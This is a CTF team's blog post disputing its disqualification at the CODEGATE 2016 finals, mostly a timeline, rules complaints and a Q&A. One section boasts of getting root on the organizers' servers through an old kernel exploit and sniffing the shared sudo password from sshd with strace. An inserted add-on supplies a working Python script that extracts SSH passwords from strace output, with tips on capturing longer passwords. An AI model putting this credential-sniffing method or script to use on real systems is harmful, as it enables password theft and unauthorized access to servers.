Final Scoreboard as captured by manhluat (l4w)
CTF team LC↯BC has been banned and stripped of the first place at CODEGATE CTF 2016 Finals.
The fact has been announced after competition ended and even after they announced the winners. Disqualification decision was made in the most unprofessional and biased way possible, and the CTF organizers (Black Perl Security) and CODEGATE ignore our emails starting this week, so we are making it public to avoid gossip and speculation.
Also, there is a bit of technical details.
1. PPP 3570
2. LC↯BC 3440
3. 0daysober 2658
30 min before the end of the CTF, we hold second place behind PPP. The distance to first place is a couple of hundred points: we need either of the two remaining challenges to make it to the top.
T−10min. We submit hulkbox challenge to the gameboard, getting 1st.
1. LC↯BC 3761
2. PPP 3570
3. 0daysober 2658
T−9min. The CTF organizers’ team leader starts aggressively demanding that we show him the exploit for the challenge. The task was pwned by one of us who couldn’t make it to Korea and was swapped with someone who could; the guy is asleep in Russia at the moment the flag is submitted (3:50 a.m. in the UTC+3 timezone), so we propose to show the orgs the exploit later once he’s up.
T=. CTF ends, organizers announce the winners. Press begins to interview us.
T+15min. Organizers interrupt the press session and make everyone leave except the teams. It is announced that one of the teams was using remote assistance during the competition. A poll is held on whether remote help is good or bad. “It’s good” 3 : 7 “it’s bad”
T+20min. It’s announced that LC↯BC is disqualified. The scoreboard shifts one row up. We ask why we got disqualified. — Remote assistance. — But it’s not in the rules?? — It’s not in the rules, and you’re disqualified.
1. PPP 3570
2. 0daysober 2658
3. 217 2632
T+30min. Orgas announce the winners: PPP, 0daysober, 217.
T+4days. None of our emails to either CODEGATE or CTF orgas get answered.
- The rules don’t mention anything regarding remote players. We will not speculate whether other teams asked their folks who couldn’t come to Seoul for help, but since the voting result was 3 : 7, this rule was not common knowledge. If it is forbidden and important to the point of taking away a team’s result, the rules should state it openly.
- The orgas’ team leader circled around the PPP table, talking in Korean in a low voice throughout the entire game. We know that sounds stupid, but it’s at least amusing. It even made us think the orgas might be biased in their decision when we surpassed PPP. Now that the orgs don’t answer our attempts to communicate, they’re clearly not cooperating with us.
- For the last two hours the orgas stared at our displays assertively. Apart from the fact that it’s pretty uncomfortable and breaks your focus when you’re trying to RE, they had more than enough time to tell us if they didn’t like anything about us.
- Well, we pwned the infrastructure.
VMs that hosted the services were running this:
Linux codegate 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
which is a quarter-year-old kernel vulnerable to this unpopular local privilege escalation strategy (shoutout to halfdog.net).
We were able to get UID 0 on hackerlife and get a free flag (which we didn’t submit until we had pwned the challenge) as well as /etc/shadow as our trophy.
Some time later payload challenge was released, running the exact same kernel, so why not try escalating there too?
OK, this is interesting: the codegate user has the exact same hash. Let’s attach strace to the SSH server and wait for the password to fly by in plaintext.
root@codegate:/# strace -ff -p 17809 -e read |& fgrep ', "\f\0\0'
[pid 17865] read(6, "\f\0\0\0\21qkqojrr******lek!", 22) = 22
And yeah, it turns out that every game box has a sudoer codegate account with the exact same password (which is qkqojrr******lek!). Game over!
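What the fgrep pattern above is actually catching, as an added example that is not part of the original post: the privileged sshd monitor reads the password from its unprivileged child as a MONITOR_REQ_AUTHPASSWORD message (type byte 12, which strace prints as “\f”), followed by a big-endian uint32 length and the password bytes; the 22-byte read in the post is 1 + 4 + 17 bytes, so the 17-character password is exactly what follows the “\21”. That interpretation of the bytes is my assumption based on OpenSSH’s monitor protocol, and so are the function names below and the sample, which is constructed with a fake password rather than the real capture. The script decodes strace’s escaped strings and pulls the password out of any complete message, which is more robust than eyeballing the output:

```python
import re

# Request type the unprivileged sshd child sends to the privileged monitor
# with the user's password (OpenSSH monitor.h: MONITOR_REQ_AUTHPASSWORD = 12,
# which strace prints as "\f"). Assumption: that is what the \f\0\0\0 prefix
# in the post's fgrep pattern is matching.
MONITOR_REQ_AUTHPASSWORD = 12

# strace's C-style escapes for non-printable bytes.
_SIMPLE_ESCAPES = {
    "n": 0x0A, "t": 0x09, "r": 0x0D, "f": 0x0C, "v": 0x0B,
    "a": 0x07, "b": 0x08, '"': 0x22, "\\": 0x5C,
}

# read(fd, "...", count) = ret  -- only lines strace printed in full match;
# a buffer cut by the default -s 32 limit shows up as "..."... and is skipped.
READ_RE = re.compile(r'read\((\d+), "((?:[^"\\]|\\.)*)", \d+\) = (\d+)')


def decode_strace_string(s: str) -> bytes:
    """Turn the escaped string strace prints back into the raw bytes read."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] != "\\":
            out.append(ord(s[i]))
            i += 1
            continue
        e = s[i + 1]
        if e in _SIMPLE_ESCAPES:
            out.append(_SIMPLE_ESCAPES[e])
            i += 2
        elif e == "x":                      # \xHH (strace -x / -xx output)
            out.append(int(s[i + 2:i + 4], 16))
            i += 4
        else:                               # \o, \oo or \ooo octal
            j = i + 1
            while j < len(s) and j - (i + 1) < 3 and s[j] in "01234567":
                j += 1
            out.append(int(s[i + 1:j], 8))
            i = j
    return bytes(out)


def extract_passwords(strace_output: str) -> list:
    """Return (fd, password) for every complete MONITOR_REQ_AUTHPASSWORD read."""
    found = []
    for line in strace_output.splitlines():
        m = READ_RE.search(line)
        if not m:
            continue
        fd, escaped, ret = int(m.group(1)), m.group(2), int(m.group(3))
        data = decode_strace_string(escaped)
        if len(data) != ret:
            continue                        # strace did not show the whole buffer
        # Message layout: type byte, then an SSH "string": uint32 BE length + bytes.
        if len(data) < 5 or data[0] != MONITOR_REQ_AUTHPASSWORD:
            continue
        n = int.from_bytes(data[1:5], "big")
        if len(data) != 5 + n:
            continue                        # not a lone password message
        found.append((fd, data[5:].decode("utf-8", "replace")))
    return found


# Constructed sample (fake password "hunter2!"). The third line has the same
# layout as the post's capture: 0x0c, uint32 length, then the password bytes.
SAMPLE = r'''[pid 17865] read(4, "SSH-2.0-x\r\n", 8192) = 11
[pid 17865] read(6, "\0\0\0\r", 4) = 4
[pid 17865] read(6, "\f\0\0\0\10hunter2!", 13) = 13
[pid 17865] read(6, "\r\0\0\0\1", 5) = 5
'''

if __name__ == "__main__":
    for fd, pw in extract_passwords(SAMPLE):
        print(f"fd {fd}: password {pw!r}")
```

Two practical notes on the original one-liner: strace writes its trace to stderr, which is why the post needs bash’s |& rather than a plain pipe, and strace prints at most 32 bytes of a buffer by default, so a password longer than about 27 characters would be cut off unless you raise the limit with -s.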
After paying a friendly visit to every vulnbox and scoreboard server, we stopped wasting time on this fun “side challenge” and proceeded to play as usual.
Treat this as a fun piece.
- LC↯BC had 4 people on-site and 2 remote connected via VPN.
- On-site guys played 100% of the CTF time, remote guys joined and left at their leisure: no-one has free 20 hours during a workday.
- LC↯BC got root privileges on every game server. No attempts were made to destabilize the infrastructure or ruin the fun of the game.
- Security specialists who organize a CTF with an eight-year history and 55K USD in prizes did:
- use old Linux kernel version with a public exploit available;
- use the same password for a sudo user on the entire infrastructure;
- use passwords to access the servers;
- spend their time on petty tyranny and annoying players.
- Our solutions for all the tasks that we have submitted:
/home/g0est/flag_tlqkf.txt from payload vulnbox that we have not submitted:
Q & A
Questions related to rules of the competition:
Screenshot of the rules taken during competition
Q: Did LC↯BC submit write-up to CODEGATE organizer after the qualification?
Q: Did LC↯BC join both CODEGATE CTF 2016 and CODEGATE CTF Junior 2016?
Q: Did LC↯BC share the solution or key of any challenge while competition?
Q: Did LC↯BC attack operating server for everyone :)?
Q: Was there a rule effective regarding immediately showing your exploit to event organizer?
Q: Was there a rule effective regarding remote team members?
Q: Were there remote players playing for us?
Q: Were we warned before or during the game that remote help can lead to disqualification?
Q: Have we traded any flags with other teams or organizers?
A: Of course not!
Q: Have we compromised CTF infrastructure (server-side) ?
Q: Did we interfere with infrastructure in any way that ruins CTF gameplay for anyone?
Q: Did we have the ability to score every single flag available in the competition (incl. Junior CTF) ?
Q: Were all flags submitted to the scoreboard solved by LC↯BC in a proper way?
Hope this shares our vision reasonably and ends any rumors and conjectures about what happened to our team in Seoul this year. We’d like to add that the CODEGATE organizers have been friendly and helpful every year (we’re visiting the event for the 6th year in a row), and we hope to hear their vision of the current situation.
Current stance of the orgas really does surprise and irritate us and makes us wonder what to expect from future CODEGATEs.
Guys, please don’t hide. We’re up to discuss it peacefully.